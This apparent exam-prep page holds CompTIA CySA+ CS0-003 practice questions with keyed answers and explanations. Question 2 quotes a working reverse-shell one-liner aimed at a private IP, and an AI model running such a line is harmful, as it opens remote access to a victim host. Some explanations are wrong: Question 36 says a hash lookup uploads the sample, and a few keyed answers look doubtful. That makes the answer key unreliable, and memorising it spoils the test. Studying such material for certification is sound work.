CompTIA CySA+ (CS0-003) Practice Questions with Explanations

Free CompTIA CySA+ practice questions for the CS0-003 exam. 50 of them, each with the correct answer, a full explanation, and the reason every other option is wrong. CompTIA's intermediate analyst certification, between Security+ and SecurityX. It is scenario-heavy: interpreting SIEM output, triaging alerts, prioritising vulnerabilities and working an incident end to end, not reciting definitions.

About the CS0-003 exam

  • Security operations: 33%
  • Vulnerability management: 30%
  • Incident response management: 20%
  • Reporting and communication: 17%

Up to 85 questions, 165 minutes, passing score 750/900, US$370 per attempt.

Get the full CS0-003 question bank (627 questions) →

CS0-003 practice questions

Question 1

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

  • A. Eradication
  • B. Recovery
  • C. Containment
  • D. Preparation
Show answer and explanation ▾

Correct answer: A

Eradication is the phase where vulnerabilities and threats are removed from the system to eliminate the root cause of the incident. By isolating the vulnerability and actively removing it, the analyst is performing eradication activities.

Why the other options are wrong:

  • B. Recovery involves restoring systems to normal operations after the threat is removed.
  • C. Containment focuses on limiting the scope and impact of the incident, not removing the vulnerability.
  • D. Preparation is the pre-incident phase focused on readiness and tools, not remediation.

Question 2

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?

  • A. RCE
  • B. Reverse shell
  • C. XSS
  • D. SQL injection
Show answer and explanation ▾

Correct answer: B

The command launches an interactive shell (sh -i) and redirects both its standard output and standard input through a network device file pointing at a remote host and port (/dev/udp/10.1.1.1/4821). That pattern makes the victim machine initiate an outbound connection back to the attacker's listener and hand it a shell, which is the textbook definition of a reverse shell.

Why the other options are wrong:

  • A. Remote code execution is the delivery mechanism that would run this payload, but the payload itself is specifically establishing an outbound shell session.
  • C. Cross-site scripting involves injecting script into web pages rendered by other users, not shell redirection to a UDP socket.
  • D. SQL injection manipulates database query syntax; no SQL statements or database interaction appear here.

Question 3

When starting an investigation, which of the following must be done first?

  • A. Notify law enforcement
  • B. Secure the scene
  • C. Seize all related evidence
  • D. Interview the witnesses
Show answer and explanation ▾

Correct answer: B

Securing the scene is the critical first step in any investigation because it preserves evidence, prevents tampering, prevents further damage, and ensures the integrity of the investigation. Without securing the scene, evidence can be lost or contaminated, which undermines all subsequent investigation steps.

Why the other options are wrong:

  • A. Notifying law enforcement may come later depending on the incident severity and organizational policy
  • C. Seizing evidence happens after the scene is secured to ensure proper chain of custody
  • D. Interviewing witnesses occurs after the scene is secured to preserve evidence integrity

Question 4

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

  • A. Data enrichment
  • B. Security control plane
  • C. Threat feed combination
  • D. Single pane of glass
Show answer and explanation ▾

Correct answer: D

A 'single pane of glass' refers to a unified interface where security tools and data are consolidated, eliminating the need to switch between multiple systems. By integrating security controls into the SIEM, analysts can view and manage all security information from one location, which directly reduces MTTR by improving efficiency and visibility.

Why the other options are wrong:

  • A. Data enrichment adds context to data but doesn't create a unified interface
  • B. Security control plane refers to centralized management of controls, not interface consolidation
  • C. Threat feed combination involves aggregating threat intelligence sources, not tool integration

Question 5

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

  • A. Avoid
  • B. Transfer
  • C. Accept
  • D. Mitigate
Show answer and explanation ▾

Correct answer: A

Risk avoidance involves refusing or discontinuing an activity to eliminate the risk entirely. By rejecting the software request due to excessive risk, the CISO chose not to accept the risk at all, which is the definition of risk avoidance.

Why the other options are wrong:

  • B. Transfer would involve shifting risk to a third party through insurance or outsourcing.
  • C. Accept would mean acknowledging and tolerating the risk despite its high score.
  • D. Mitigate would involve implementing controls to reduce the risk to acceptable levels.

Question 6

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

  • A. Clone the virtual server for forensic analysis
  • B. Log m to the affected server and begin analysis of the logs
  • C. Restore from the last known-good backup to confirm there was no loss of connectivity
  • D. Shut down the affected server immediately
Show answer and explanation ▾

Correct answer: A

Before any analysis or logging access occurs, the first action must be to preserve the evidence in its current state. Cloning the virtual server creates a forensic image that maintains chain of custody and prevents alteration of the original system. Live analysis (option B) risks modifying volatile data and the system state. Restoring from backup (option C) would overwrite potential evidence. Shutting down immediately (option D) without preservation loses volatile evidence and contradicts proper forensic procedure when the system is already isolated.

Why the other options are wrong:

  • B. Live analysis on the active system risks contaminating evidence and modifying the environment.
  • C. Restoring from backup destroys the current state and any evidence of what actually occurred.
  • D. Shutting down without first capturing an image loses all volatile memory evidence and runtime state.

Question 7

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

  • A. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
  • B. CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
  • C. CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H
  • D. CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Show answer and explanation ▾

Correct answer: A

The described threat is remotely exploitable, needs no privileges and no user interaction, and impacts confidentiality and integrity heavily while leaving availability untouched. Option A maps exactly to that profile: AV:N (network attack vector, consistent with active remote exploitation), AC:L (low complexity, as seen with a zero-day being exploited at scale), PR:N (no privilege escalation required), UI:N (no user interaction), S:U (unchanged scope), C:H and I:H (significant confidentiality and integrity loss), and A:N (no availability impact). No other vector combines all of these values.

Why the other options are wrong:

  • B. It requires high privileges (PR:H) and user interaction (UI:R), and it lists an availability impact (A:L), contradicting the scenario.
  • C. It requires user interaction (UI:R), understates confidentiality loss (C:L), and adds a high availability impact the scenario says does not exist.
  • D. It restricts the attack to local access (AV:L), requires privileges and user interaction, and shows high availability impact with only low integrity impact.

Question 8

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

  • A. Agree on the goals and objectives of the plan
  • B. Determine the site to be used during a disaster
  • C. Demonstrate adherence to a standard disaster recovery process
  • D. Identify applications to be run during a disaster
Show answer and explanation ▾

Correct answer: A

Establishing goals and objectives is the foundational first step in disaster recovery planning because all subsequent decisions about site selection, applications to prioritize, and recovery time objectives (RTO) must align with organizational business requirements and priorities. Without clear goals, the plan will lack direction and may not address the organization's actual needs. This step defines the scope and parameters for all other planning activities.

Why the other options are wrong:

  • B. Site selection depends on understanding goals and recovery requirements first.
  • C. Demonstrating adherence to standards comes after the plan is developed.
  • D. Identifying applications requires understanding business priorities, which comes from goals.

Question 9

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

  • A. Hard disk
  • B. Primary boot partition
  • C. Malicious files
  • D. Routing table
  • E. Static IP address
Show answer and explanation ▾

Correct answer: D

When preserving sensitive information before isolating a server, volatile data that exists only in memory or active system state must be captured first. The routing table represents volatile network configuration data that will be lost when the server is powered down or isolated. This follows the order of volatility principle in digital forensics, where the most ephemeral data must be collected before less volatile data like hard disks. Once the server is isolated, this routing information may be impossible to recover.

Why the other options are wrong:

  • A. Hard disk data is persistent and can be collected at any time, even after isolation.
  • B. Boot partition data is persistent and not at risk of loss during isolation.
  • C. Malicious files are persistent on disk and not volatile.
  • E. Static IP address configuration is persistent and not at risk during isolation.

Question 10

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

  • A. CDN
  • B. Vulnerability scanner
  • C. DNS
  • D. Web server
Show answer and explanation ▾

Correct answer: C

When investigating a DDoS attack causing internet outage, DNS logs should be reviewed first to identify if the attack involved DNS amplification, DNS flooding, or DNS hijacking. DNS logs will show the attack pattern and help determine the attack vector. While CDN, vulnerability scanner, and web server logs may provide supporting information, DNS logs are most relevant for understanding how the external connectivity was disrupted.

Why the other options are wrong:

  • A. CDN logs would show content delivery issues but not the root cause of the DDoS attack itself.
  • B. Vulnerability scanner logs are irrelevant to a DDoS attack investigation.
  • D. Web server logs might show traffic patterns but DNS logs are more fundamental to understanding connectivity loss.

Question 11

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

  • A. Reduce the administrator and privileged access accounts
  • B. Employ a network-based IDS
  • C. Conduct thorough incident response
  • D. Enable SSO to enterprise applications
Show answer and explanation ▾

Correct answer: A

Reducing privileged and administrator accounts is a foundational zero trust principle that addresses a primary attack vector. Compromised privileged accounts are among the most damaging to organizations, making their reduction a top priority in reducing attack surface and aligning with common attack frameworks like MITRE ATT&CK.

Why the other options are wrong:

  • B. Network-based IDS is detection-focused, not an attack surface reduction strategy.
  • C. Incident response is reactive, not proactive attack surface reduction.
  • D. SSO improves usability but doesn't directly reduce attack surface compared to privilege reduction.

Question 12

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

  • A. Deploy a CASB and enable policy enforcement
  • B. Configure MFA with strict access
  • C. Deploy an API gateway
  • D. Enable SSO to the cloud applications
Show answer and explanation ▾

Correct answer: A

A Cloud Access Security Broker (CASB) with policy enforcement provides visibility into shadow IT cloud applications and enforces organizational security policies, data protection rules, and compliance controls. CASBs monitor and block unauthorized cloud use while allowing sanctioned applications. MFA, API gateways, and SSO improve security but don't specifically eliminate shadow IT or reduce the risk of unsanctioned cloud applications.

Why the other options are wrong:

  • B. MFA secures authentication but doesn't prevent unauthorized cloud application use
  • C. API gateways manage API access but don't address shadow IT cloud application discovery and control
  • D. SSO improves authentication but doesn't prevent employees from using unsanctioned cloud services

Question 13

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

  • A. Code analysis
  • B. Static analysis
  • C. Reverse engineering
  • D. Fuzzing
Show answer and explanation ▾

Correct answer: B

Static analysis is the best initial technique for analyzing a malicious binary file because it examines the code without executing it, making it safe and effective for initial assessment. Static analysis can identify malicious signatures, suspicious code patterns, and potential functionality without risking system compromise from execution.

Why the other options are wrong:

  • A. Code analysis is too general; static analysis is the specific malware analysis technique.
  • C. Reverse engineering is more complex and typically done after initial analysis reveals it's necessary.
  • D. Fuzzing is used to find vulnerabilities by providing invalid input, not for analyzing existing malware.

Question 14

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

  • A. Beaconing
  • B. Cross-site scripting
  • C. Buffer overflow
  • D. PHP traversal
Show answer and explanation ▾

Correct answer: A

Beaconing is when a compromised device maintains periodic communication with an external command-and-control server. The analyst observed an internal device consistently sending traffic to a known-malicious IP (establishing a C2 channel), which is the defining characteristic of beaconing behavior.

Why the other options are wrong:

  • B. Cross-site scripting is a web application vulnerability, not network-level device communication
  • C. Buffer overflow is a memory exploitation technique, not related to HTTPS traffic patterns to external IPs
  • D. PHP traversal is a directory traversal vulnerability in web applications, not relevant to beaconing patterns

Question 15

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

  • A. MITRE ATT&CK
  • B. Cyber Kill Cham
  • C. OWASP
  • D. STIX/TAXII
Show answer and explanation ▾

Correct answer: A

MITRE ATT&CK is a comprehensive framework specifically designed to catalog and compare Tactics, Techniques, and Procedures (TTPs) used by known adversaries. It enables security analysts to identify patterns and differences between threat actors.

Why the other options are wrong:

  • B. Cyber Kill Chain describes attack phases but is not optimized for comparing TTPs between different adversaries.
  • C. OWASP focuses on web application security, not adversary TTP analysis.
  • D. STIX/TAXII are standards for sharing threat intelligence but not primarily designed for TTP comparison.

Question 16

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

  • A. Isolate Joe's PC from the network
  • B. Reimage the PC based on standard operating procedures
  • C. Initiate a remote wipe of Joe's PC using mobile device management
  • D. Perform no action until HR or legal counsel advises on next steps
Show answer and explanation ▾

Correct answer: D

Before taking any technical action that could impact an employee, HR and legal counsel must be consulted to ensure compliance with employment law, contractual obligations, and organizational policies. Premature technical actions could expose the organization to legal liability and complicate investigations.

Why the other options are wrong:

  • A. Isolating the PC without legal/HR guidance could violate employment rights and legal requirements.
  • B. Reimaging without proper authorization could constitute inappropriate evidence handling and legal violations.
  • C. Remote wiping devices without legal consultation could destroy evidence and violate employment laws.

Question 17

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

  • A. Implement step-up authentication for administrators
  • B. Improve employee training and awareness
  • C. Increase password complexity standards
  • D. Deploy mobile device management
Show answer and explanation ▾

Correct answer: B

Employee training and awareness is the best control against sensitive information disclosure via file sharing services because it addresses the human behavior component -educating users about data classification, secure file sharing practices, and the risks of unauthorized disclosure. Technical controls alone cannot prevent users who understand the risks from making informed security decisions.

Why the other options are wrong:

  • A. Step-up authentication for administrators doesn't address employee use of file sharing services for sensitive data.
  • C. Password complexity doesn't prevent intentional or accidental sensitive data uploads to file sharing services.
  • D. Mobile device management focuses on device security but doesn't prevent file sharing service misuse from any device.

Question 18

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

  • A. Mean time to detect
  • B. Number of exploits by tactic
  • C. Alert volume
  • D. Quantity of intrusion attempts
Show answer and explanation ▾

Correct answer: A

Mean Time to Detect (MTTD) is the best metric to focus on after investing in SIEM, SOAR, and ticketing systems because these tools are specifically designed to identify threats faster and more accurately. MTTD measures the organization's capability to discover security incidents, which directly reflects the value of the detection and orchestration infrastructure. Alert volume and exploit counts are less meaningful, and intrusion attempt quantity does not measure the organization's actual detection capabilities.

Why the other options are wrong:

  • B. Number of exploits by tactic measures threat landscape, not detection capability.
  • C. Alert volume is a measure of noise, not effectiveness of new tools.
  • D. Quantity of intrusion attempts is outside the organization's control and doesn't measure tool effectiveness.

Question 19

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

  • A. Credentialed network scanning
  • B. Passive scanning
  • C. Agent-based scanning
  • D. Dynamic scanning
Show answer and explanation ▾

Correct answer: A

Credentialed network scanning provides the most accurate vulnerability assessment results while minimizing excessive access to sensitive data. It uses legitimate authentication credentials to scan systems, allowing deep inspection of configurations and patches without requiring broad privileged access to sensitive information. This balances accuracy with security concerns.

Why the other options are wrong:

  • B. Passive scanning provides lower accuracy and may miss many vulnerabilities, not addressing the accuracy requirement.
  • C. Agent-based scanning requires installation on all systems and still needs significant system-level access.
  • D. Dynamic scanning typically requires execution privileges and can generate more noise/impact on systems.

Question 20

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

  • A. Scope
  • B. Weaponization
  • C. CVSS
  • D. Asset value
Show answer and explanation ▾

Correct answer: B

Weaponization is the factor that causes CVSS score escalation when a previously disclosed vulnerability gains a widely available exploit being actively used for attacks like ransomware delivery. While CVSS is the scoring system itself, weaponization specifically refers to the availability and active use of exploits, which is a critical factor in threat intelligence that justifies score increases.

Why the other options are wrong:

  • A. Scope in CVSS is a fixed metric that doesn't change after initial scoring based on exploit availability.
  • C. CVSS is the system used, not the reason for escalation; the reason is the increased threat from active exploitation.
  • D. Asset value may influence prioritization but is not a CVSS metric or standard reason for score escalation.

Question 21

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

  • A. To satisfy regulatory requirements for incident reporting
  • B. To hold other departments accountable
  • C. To identify areas of improvement in the incident response process
  • D. To highlight the notable practices of the organization's incident response team
Show answer and explanation ▾

Correct answer: C

Lessons learned are included in after-action reports specifically to identify areas for improvement in incident response procedures, tools, and processes. This allows the organization to strengthen its capabilities for future incidents. Regulatory compliance (option A) may require incident reporting but not specifically lessons learned sections. Holding departments accountable (option B) is not the primary purpose of lessons learned. Highlighting notable practices (option D) is secondary to the primary goal of improvement.

Why the other options are wrong:

  • A. Regulatory reporting requirements don't specifically mandate lessons learned sections.
  • B. Lessons learned focus on process improvement, not departmental blame or accountability.
  • D. While notable practices may be documented, the primary purpose is identifying gaps and improvements.

Question 22

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

  • A. Weaponization
  • B. Reconnaissance
  • C. Delivery
  • D. Exploitation
Show answer and explanation ▾

Correct answer: D

The actor has already gained access through social engineering (Delivery phase) and is now maintaining that access to continue the attack. This is the Exploitation stage, where the attacker has successfully compromised the system and is working to maintain persistence and control. The actor's concern about losing access indicates they are actively exploiting the compromised environment.

Why the other options are wrong:

  • A. Weaponization occurs before delivery when the attacker prepares malicious tools.
  • B. Reconnaissance is the initial information gathering phase, not after gaining access.
  • C. Delivery is the phase where the attack vector is sent, which has already occurred.

Question 23

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

  • A. Determine the sophistication of the audience that the report is meant for
  • B. Include references and sources of information on the first page
  • C. Include a table of contents outlining the entire report
  • D. Decide on the color scheme that will effectively communicate the metrics
Show answer and explanation ▾

Correct answer: A

Determining the sophistication level of the audience is the best first step in preparing any technical report because it directly influences the depth of technical detail, terminology used, and overall presentation approach. Understanding the audience ensures the report will be appropriately pitched and effectively communicate lessons learned regardless of whether readers are executives or technical staff.

Why the other options are wrong:

  • B. Including references and sources is important but comes after understanding audience needs and content requirements.
  • C. A table of contents is helpful but is secondary to understanding what level of detail and terminology the audience requires.
  • D. Color scheme decisions are cosmetic and come last in report preparation, not affecting the fundamental approach to content.

Question 24

Which of the following security operations tasks are ideal for automation?

  • A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder
  • B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules
  • C. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number Call the user to help with any questions about using the application
  • D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine
Show answer and explanation ▾

Correct answer: A

Suspicious file analysis with automatic categorization and organization is an ideal candidate for automation because it involves repeatable, deterministic rules applied to large volumes of data without requiring human judgment for each decision. The process of identifying suspicious graphics, categorizing them by type, and moving them to appropriate folders can be fully automated through scripting. The other options all require significant human judgment, investigation, or follow-up that cannot be fully automated without creating false positives or missing context.

Why the other options are wrong:

  • B. Firewall IoC blocking requires human judgment on false positives and may cause business impact.
  • C. User support calls require direct human interaction and contextual understanding.
  • D. Email analysis with phishing metrics requires human judgment to validate and adjust thresholds.

Question 25

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

  • A. Business continuity plan
  • B. Vulnerability management plan
  • C. Disaster recovery plan
  • D. Asset management plan
Show answer and explanation ▾

Correct answer: C

A Disaster Recovery Plan (DRP) specifically focuses on restoring critical systems and services after an incident or disaster, ensuring mission-critical operations resume. While business continuity planning (BCP) addresses broader organizational continuity, DRP is the technical implementation that directly ensures service availability post-incident. Vulnerability and asset management plans prevent incidents but don't ensure recovery.

Why the other options are wrong:

  • A. BCP addresses organizational continuity but is broader than ensuring technical service availability
  • B. Vulnerability management prevents incidents but doesn't restore services after they fail
  • D. Asset management tracks resources but doesn't restore availability during incidents

Question 26

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

  • A. Exploitation
  • B. Reconnaissance
  • C. Command and control
  • D. Actions on objectives
Show answer and explanation ▾

Correct answer: B

An external IP address running network and vulnerability scans against external-facing assets is conducting reconnaissance. This is the second phase of the attack framework where the attacker gathers information about the target systems, their vulnerabilities, and network topology to prepare for future attacks.

Why the other options are wrong:

  • A. Exploitation involves actually compromising systems, not just scanning.
  • C. Command and control is established after a successful compromise.
  • D. Actions on objectives occur after exploitation when the attacker achieves their goals.

Question 27

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

  • A. Single pane of glass
  • B. Single sign-on
  • C. Data enrichment
  • D. Deduplication
Show answer and explanation ▾

Correct answer: A

A single pane of glass provides a unified interface to view and manage multiple data sources and threat feeds in one consolidated location. This directly addresses the need to consolidate several threat intelligence feeds and portals while maximizing visibility and results.

Why the other options are wrong:

  • B. Single sign-on manages user authentication across systems but doesn't consolidate data sources.
  • C. Data enrichment adds context to threat data but doesn't consolidate multiple feeds into one interface.
  • D. Deduplication removes duplicate data but doesn't provide the consolidated view needed for the stated goal.

Question 28

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

  • A. The lead should review what is documented in the incident response policy or plan
  • B. Management level members of the CSIRT should make that decision
  • C. The lead has the authority to decide who to communicate with at any t me
  • D. Subject matter experts on the team should communicate with others within the specified area of expertise
Show answer and explanation ▾

Correct answer: A

The incident response policy or plan documents the communication framework, including escalation procedures, contact lists, and timing requirements for notification. This ensures consistent, documented communication during incidents and clarifies roles and responsibilities for the CSIRT lead.

Why the other options are wrong:

  • B. While management may be consulted, the policy provides the authoritative guidance, not arbitrary management decisions
  • C. The lead must follow established policies and procedures, not make unilateral decisions about communication
  • D. While SMEs communicate within their areas, the overarching decision-making and timing come from the incident response plan

Question 29

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

  • A. PCI Security Standards Council
  • B. Local law enforcement
  • C. Federal law enforcement
  • D. Card issuer
Show answer and explanation ▾

Correct answer: D

Under PCI DSS compliance requirements, organizations experiencing a breach of cardholder data must report the incident to the card issuer or acquiring bank, as they are the entity responsible for the payment card accounts affected. The PCI Security Standards Council is not a breach notification recipient, and while law enforcement may be involved in some cases, PCI DSS specifically mandates notification to the card issuer as the primary compliance requirement.

Why the other options are wrong:

  • A. The PCI Security Standards Council is not a breach notification recipient.
  • B. Local law enforcement is not required by PCI DSS for breach notification.
  • C. Federal law enforcement is not required by PCI DSS for breach notification.

Question 30

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

  • A. Conduct regular red team exercises over the application in production
  • B. Ensure that all implemented coding libraries are regularly checked
  • C. Use application security scanning as part of the pipeline for the CI/CD flow
  • D. Implement proper input validation for any data entry form
Show answer and explanation ▾

Correct answer: C

Using application security scanning as part of the CI/CD pipeline ensures vulnerabilities are caught early and continuously throughout the development process. This prevents the same vulnerabilities from repeatedly appearing in production by integrating security testing into the development workflow itself, making it a systematic and automated approach.

Why the other options are wrong:

  • A. Red team exercises are post-deployment testing and don't prevent vulnerabilities during development.
  • B. Checking coding libraries helps but doesn't directly address application-specific vulnerabilities.
  • D. Input validation is a specific coding practice but doesn't systematically catch all recurring vulnerabilities across the pipeline.

Question 31

A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

  • A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
  • B. An on-path attack is being performed by someone with internal access that forces users into port 80
  • C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
  • D. An error was caused by BGP due to new rules applied over the company's internal routers
Show answer and explanation ▾

Correct answer: B

An on-path attacker with internal access can intercept HTTPS requests and force downgrade to HTTP (port 80), which explains why users intermittently see both HTTP and HTTPS access. This is consistent with compromised user accounts and represents an active man-in-the-middle attack. SSL certificate issues would cause complete unavailability, load balancing wouldn't downgrade protocols, and BGP changes don't affect individual user protocol selection.

Why the other options are wrong:

  • A. SSL certificate issues cause consistent HTTPS failures, not intermittent switching between protocols
  • C. Web servers under load use internal queuing, not protocol downgrade to HTTP
  • D. BGP operates at network routing layer and doesn't control application-layer protocol selection

Question 32

Which of the following is an important aspect that should be included in the lessons- learned step after an incident?

  • A. Identify any improvements or changes in the incident response plan or procedures
  • B. Determine if an internal mistake was made and who did it so they do not repeat the error
  • C. Present all legal evidence collected and turn it over to iaw enforcement
  • D. Discuss the financial impact of the incident to determine if security controls are well spent
Show answer and explanation ▾

Correct answer: A

The lessons-learned phase focuses on continuous improvement by identifying what worked, what didn't, and how processes and procedures can be enhanced. This forward- looking perspective drives organizational learning and strengthens future incident response capabilities.

Why the other options are wrong:

  • B. Identifying individuals for blame is counterproductive to blameless post-incident reviews and discourages honest analysis.
  • C. Presenting legal evidence to law enforcement is part of evidence handling, not lessons-learned analysis.
  • D. While financial impact matters, determining ROI of controls is secondary to process improvement in lessons-learned.

Question 33

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

  • A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
  • B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
  • C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1} ').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
  • D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Show answer and explanation ▾

Correct answer: C

The function using 'dig' with reverse DNS lookups and ASN/CYMRU queries performs ASN (Autonomous System Number) lookups which provide routing origin information. This identifies which autonomous systems traffic is routing through, making it the most accurate method for identifying anomalies in network routing patterns by revealing unexpected or suspicious routing origins.

Why the other options are wrong:

  • A. GeoIP lookup provides geographic location data, not routing-specific information needed for routing anomalies.
  • B. Ping latency measurements show response times but don't reveal routing path or origin information.
  • D. Traceroute shows the path taken but doesn't identify the autonomous system or routing origin information needed for routing anomaly analysis.

Question 34

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

  • A. A mean time to remediate of 30 days
  • B. A mean time to detect of 45 days
  • C. A mean time to respond of 15 days
  • D. Third-party application testing
Show answer and explanation ▾

Correct answer: A

Since exploits occur 45 days after patch release, establishing a Mean Time To Remediate (MTTR) of 30 days ensures patches are deployed before widespread exploitation occurs. This directly addresses the threat window. MTTD of 45 days would match the exploit timeline (too slow), MTTR of 15 days only measures response time without guaranteeing completion, and third-party testing adds delay to patch deployment.

Why the other options are wrong:

  • B. MTTD of 45 days matches the exploitation timeline, providing no protection advantage
  • C. MTTR of 15 days measures response initiation but doesn't guarantee completion within the threat window
  • D. Third-party testing adds time before patches are deployed, increasing vulnerability exposure

Question 35

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

  • A. PAM
  • B. IDS
  • C. PKI
  • D. DLP
Show answer and explanation ▾

Correct answer: D

Data Loss Prevention (DLP) is specifically designed to monitor, detect, and prevent unauthorized transmission of sensitive information including PII outside organizational boundaries. DLP tools scan data in motion and at rest to enforce policies against exfiltration. PAM manages privileged access, IDS detects intrusions, and PKI manages encryption-none are designed to specifically prevent PII exposure.

Why the other options are wrong:

  • A. PAM controls privileged account access but doesn't prevent data exfiltration
  • B. IDS detects network intrusions but doesn't prevent sensitive data disclosure
  • C. PKI manages certificates and encryption but doesn't monitor for data exposure

Question 36

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

  • A. Upload the binary to an air gapped sandbox for analysis
  • B. Send the binaries to the antivirus vendor
  • C. Execute the binaries on an environment with internet connectivity
  • D. Query the file hashes using VirusTotal
Show answer and explanation ▾

Correct answer: A

Uploading binaries to an air-gapped sandbox ensures analysis without disclosing information to attackers because the isolated environment has no internet connectivity, preventing the malware from communicating with command-and-control servers or allowing attackers to detect the analysis. This maintains operational security by keeping the investigation hidden from adversaries.

Why the other options are wrong:

  • B. Sending binaries to antivirus vendors immediately discloses the malware samples to third parties and potentially to attackers.
  • C. Executing on an internet-connected environment allows malware to communicate with attackers, revealing the analysis.
  • D. Querying VirusTotal uploads the file hash and sample to a public service, immediately disclosing the investigation to attackers.

Question 37

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

  • A. Testing
  • B. Implementation
  • C. Validation
  • D. Rollback
Show answer and explanation ▾

Correct answer: C

Validation is the next step after applying a patch because the organization must confirm that the patch was successfully applied, that the vulnerability has been remediated, and that no adverse side effects occurred. Testing typically occurs before implementation in a controlled environment, while validation occurs after implementation on the production system to verify effectiveness. Rollback is only performed if validation reveals problems.

Why the other options are wrong:

  • A. Testing should occur before implementation in a test environment.
  • B. Implementation (patch application) has already been done in the scenario.
  • D. Rollback is a contingency action only if validation reveals failure.

Question 38

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

  • A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
  • B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
  • C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
  • D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Show answer and explanation ▾

Correct answer: B

